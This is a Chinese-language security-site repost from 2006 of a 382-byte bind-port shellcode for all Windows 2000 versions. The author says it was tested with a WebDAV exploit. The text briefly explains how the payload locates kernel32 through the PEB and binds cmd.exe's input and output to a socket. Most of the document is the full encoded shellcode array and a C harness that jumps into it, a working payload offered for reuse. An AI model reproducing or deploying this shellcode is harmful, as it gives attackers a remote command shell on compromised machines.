| 382 bytes bind port shellcode for win2k all ver |
|
| 382 bytes bind port shellcode for win2k all ver |
|
|
|
作者:佚名 文章来源:不详 点击数: 更新时间:2006-12-5 19:19:53  |
1)从PEB中获取kernel32.dll的起始地址;
2)根据kernel32.dll的起始地址,计算GetProcAddress函数在内存中的地址;
3)直接把socket句柄设置为cmd.exe进程的标准输入、输出、错误信息句柄;
应该可以在所有win2k平台上通用,不用考虑版本问题。测试用此shellcode
用于webdav漏洞,在中英文平台上都没问题。(英文平台指的是OS是英文版,
但default language是GB)
这些技术都是从各位前辈们的文章、代码中学来的,我只是做了简单的复制、
粘贴工作,目的是方面自己以后使用,希望对大家也有点用处 :)
BTW:我汇编很烂,代码还是比较长,期待高手优化过的更短的shellcode。
参考资料:
<1>"Exploit Microsoft INTERNET INFORMATION SERVER" by moda
http://www.nsfocus.net/index.php?act=magazine&do=view&mid=1662
<2>"THCunREAL_V0.2.ZIP" by "Johnny Cyberpunk"
http://packetstormsecurity.org/0304-exploits/THCunREAL_V0.2.ZIP
<3>"116 bytes bindcode hardcoded for Windows XP SP1" by silicon
http://packetstormsecurity.nl/shellcode/bindcode.c
---------------------------------------------------------------/
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
unsigned char sc_bind_port_1981_for_2k_all_ver[382]=
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
"\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
"\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
"\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
"\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
"\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
"\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
"\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
"\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
"\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
"\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
"\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
"\xFA\xFA\xFC\xE9\xED\x99";
void main()
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
__asm
{
leaeax,sc_bind_port_1981_for_2k_all_ver
jmpeax
}
}
|
| 文章录入:wuyongjian 责任编辑:wuyongjian |
|
上一篇文章: 如何利用格式化溢出漏洞,x86/sparc
下一篇文章: zkfingerd-2.0.2 Format String Vulnerabilities |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
